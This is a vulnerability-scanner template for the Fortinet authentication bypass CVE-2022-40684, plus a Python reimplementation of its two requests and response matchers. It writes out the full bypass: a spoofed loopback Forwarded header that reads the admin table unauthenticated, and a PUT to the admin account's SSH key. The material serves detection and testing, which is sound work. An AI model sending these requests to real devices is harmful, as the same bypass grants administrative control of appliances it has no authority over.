```yaml
id: CVE-2022-40684

info:
  name: Fortigate - Authentication bypass
  author: Shockwave,nagli,carlosvieira
  severity: critical
  description: |
    An authentication bypass in the administrative interface of unpatched Fortinet products
    (FortiOS, FortiProxy and others) allows an unauthenticated remote attacker to perform
    administrative operations by sending specially crafted HTTP or HTTPS requests.
  reference:
    - https://github.com/horizon3ai/CVE-2022-40684/blob/master/CVE-2022-40684.py
    - https://securityonline.info/researchers-have-developed-cve-2022-40684-poc-exploit-code/
    - https://socradar.io/what-do-you-need-to-know-about-fortinet-critical-authentication-bypass-vulnerability-cve-2022-40684/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40684
  classification:
    cvss-score: 9.6
    cve-id: CVE-2022-40684
  tags: cve,cve2022,fortinet,fortigate,fortios,fortiproxy,auth-bypass,kev

requests:
  - raw:
      - |
        GET /api/v2/cmdb/system/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Node.js
        Forwarded: by="[127.0.0.1]:1337";for="[127.0.0.1]:1337";proto=http;host=
        X-Forwarded-Vdom: root

      - |
        PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610

        { "ssh-public-key1":"{{randstr}}" }

    stop-at-first-match: true
    req-condition: true
    matchers-condition: or
    matchers:
      - type: word
        part: body_1
        words:
          - "ENC XXXX"
          - "http_method"
        condition: and

      - type: word
        part: body_2
        words:
          - 'Invalid SSH public key.'
          - 'cli_error'
        condition: and
```
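The two-request check the template encodes, reimplemented in Python as an added example (it is neither part of the template nor of the horizon3ai PoC it references) so the matcher logic can be read and exercised offline: request 1 presents a `Forwarded` header claiming a loopback origin plus the `Node.js` user agent and reads the admin table; request 2 impersonates `Report Runner` and tries to write an invalid SSH key to the `admin` account, which a vulnerable build rejects with `cli_error` / `Invalid SSH public key.` rather than with an authentication failure. The host, port and the three sample response bodies are constructed assumptions, not captures from a real device.

```python
"""
CVE-2022-40684 check mirroring the nuclei template's two raw requests and its
matchers.  Added example, not the template's or the horizon3ai PoC's code.
The SAMPLE_* bodies are constructed for the offline tests, not real captures.
"""
import http.client
import json
import secrets
import ssl
import string
import sys

# Both Forwarded values claim the request originated on the appliance itself.
LOOPBACK = "[127.0.0.1]:1337"


def build_get_request():
    """Request 1: unauthenticated read of /api/v2/cmdb/system/admin."""
    return {
        "method": "GET",
        "path": "/api/v2/cmdb/system/admin",
        "headers": {
            "User-Agent": "Node.js",
            "Forwarded": f'by="{LOOPBACK}";for="{LOOPBACK}";proto=http;host=',
            "X-Forwarded-Vdom": "root",
        },
        "body": None,
    }


def build_put_request(pubkey=None):
    """Request 2: PUT to the 'admin' account's ssh-public-key1.  A random
    alphanumeric string (the template's {{randstr}}) is never a valid key, so
    an affected build reaches the CLI validator and rejects it without
    changing the account.  Content-Length is derived from the real body."""
    if pubkey is None:
        alphabet = string.ascii_letters + string.digits
        pubkey = "".join(secrets.choice(alphabet) for _ in range(32))
    body = json.dumps({"ssh-public-key1": pubkey})
    return {
        "method": "PUT",
        "path": "/api/v2/cmdb/system/admin/admin",
        "headers": {
            "User-Agent": "Report Runner",
            "Content-Type": "application/json",
            "Forwarded": "for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;",
            "Content-Length": str(len(body)),
        },
        "body": body,
    }


def matches_body_1(body):
    """Template matcher 1 (part: body_1, condition: and)."""
    return "ENC XXXX" in body and "http_method" in body


def matches_body_2(body):
    """Template matcher 2 (part: body_2, condition: and)."""
    return "Invalid SSH public key." in body and "cli_error" in body


def is_vulnerable(body_1, body_2=""):
    """matchers-condition: or.  With stop-at-first-match a scanner never
    sends request 2 once request 1 matched, hence body_2 may be empty."""
    return matches_body_1(body_1) or matches_body_2(body_2)


def send(host, port, req, timeout=10):
    """Send one prepared request over TLS; appliances typically present a
    self-signed certificate, so verification is disabled for the check."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    conn.request(req["method"], req["path"], body=req["body"], headers=req["headers"])
    return conn.getresponse().read().decode("utf-8", "replace")


def run(host, port=443):
    """Replays the template: request 1, then request 2 only on a miss."""
    if matches_body_1(send(host, port, build_get_request())):
        return True
    return matches_body_2(send(host, port, build_put_request()))


# Constructed response bodies in the shape the matchers look for (assumed).
SAMPLE_GET_HIT = ('{"http_method":"GET","results":[{"name":"admin",'
                  '"password":"ENC XXXX"}],"status":"success"}')
SAMPLE_GET_MISS = '{"http_method":"GET","status":"error","http_status":401}'
SAMPLE_PUT_HIT = ('{"http_method":"PUT","cli_error":"Invalid SSH public key.\\n",'
                  '"status":"error","http_status":500}')

if __name__ == "__main__":
    target = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    print("vulnerable" if run(target, target_port) else "no match")
```

Run it as `python3 check.py <host> [port]`. Note that `SAMPLE_GET_MISS` still contains `http_method`: matcher 1 needs both words, which is why the `condition: and` matters. Even though the random string fails key validation, request 2 is a write against the `admin` object on the target, so against production equipment stop after request 1 or point the check at a lab device.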